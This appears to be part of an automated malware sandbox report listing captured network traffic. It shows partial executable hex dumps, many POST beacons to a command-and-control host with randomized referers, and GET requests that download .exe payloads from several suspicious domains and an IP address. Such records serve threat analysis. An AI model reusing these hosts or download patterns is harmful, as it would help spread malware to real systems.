00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e4 01 00 00 00 90 00 00 ac 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 6c 73 00 00 00 00 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 80 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ac 08 04 00 00 90 00 00 ac 08 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 80 01 00 00 a0 04 00 11 7d 01 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:21 GMTContent-Type: application/octet-streamContent-Length: 535232Last-Modified: Thu, 13 Jan 2022 21:51:04 GMTConnection: keep-aliveETag: "61e09ec8-82ac0"Expires: Thu, 20 Jan 2022 23:16:21 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 73 0f cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3a 00 00 00 0a 04 00 00 00 00 00 00 a0 04 00 00 20 00 00 00 60 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 be bf 08 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e4 01 00 00 00 90 00 00 ac 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 6c 73 00 00 00 00 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 80 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ac 08 04 00 00 90 00 00 ac 08 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 80 01 00 00 a0 04 00 11 7d 01 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:22 GMTContent-Type: application/octet-streamContent-Length: 2387648Last-Modified: Thu, 13 Jan 2022 20:12:05 GMTConnection: keep-aliveETag: "61e08795-246ec0"Expires: Thu, 20 Jan 2022 23:16:22 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ca 5e 3d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 64 3f 00 00 18 03 00 00 00 00 00 00 e0 42 00 00 20 00 00 00 a0 3f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 44 00 00 04 00 00 6f 94 24 00 02 00 60 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 3f 00 dc 01 00 00 00 c0 3f 00 14 17 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 65 64 61 74 61 00 00 00 a0 3f 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 b0 3f 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 17 03 00 00 c0 3f 00 14 17 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 43 52 54 00 00 00 00 00 80 01 00 00 e0 42 00 17 79 01 00 00 1e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:23 GMTContent-Type: application/octet-streamContent-Length: 2387648Last-Modified: Thu, 13 Jan 2022 21:51:33 GMTConnection: keep-aliveETag: "61e09ee5-246ec0"Expires: Thu, 20 Jan 2022 23:16:23 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ca 5e 3d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 64 3f 00 00 18 03 00 00 00 00 00 00 e0 42 00 00 20 00 00 00 a0 3f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 44 00 00 04 00 00 6f 94 24 00 02 00 60 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 3f 00 dc 01 00 00 00 c0 3f 00 14 17 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 65 64 61 74 61 00 00 00 a0 3f 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 b0 3f 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 17 03 00 00 c0 3f 00 14 17 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 43 52 54 00 00 00 00 00 80 01 00 00 e0 42 00 17 79 01 00 00 1e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lkoyuevdx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://secxfi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vuafh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://psxblf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dsdofcnp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://obbsps.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ttkljrkl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fvjjmgnhpi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://giblvuodn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://unjilfapdr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bnrfjahkht.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://epntadtm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yevvbkvx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://psfbiu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://phnfrhmjav.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://etxdniy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tlotvuqfn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bjfnimnu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mkbyakqqj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://reeitd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vnmaltjgi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fmegeducg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ghiodndfpo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://njpun.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rmhfrtkprf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ynkqvnpya.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pnfnlpnysf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mosjbuj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oytdv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rljjkyrr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jpqcmep.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fosbja.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rcjgja.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yivbbwxtct.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dqwogmqhb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cvhsbw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oyghbp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yuvwrs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xkujdf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fyyanes.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tyjpjf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rsxrkuta.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jlgqjcjkdy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://avcxisfo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mvsed.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: host-data-coin-11.com
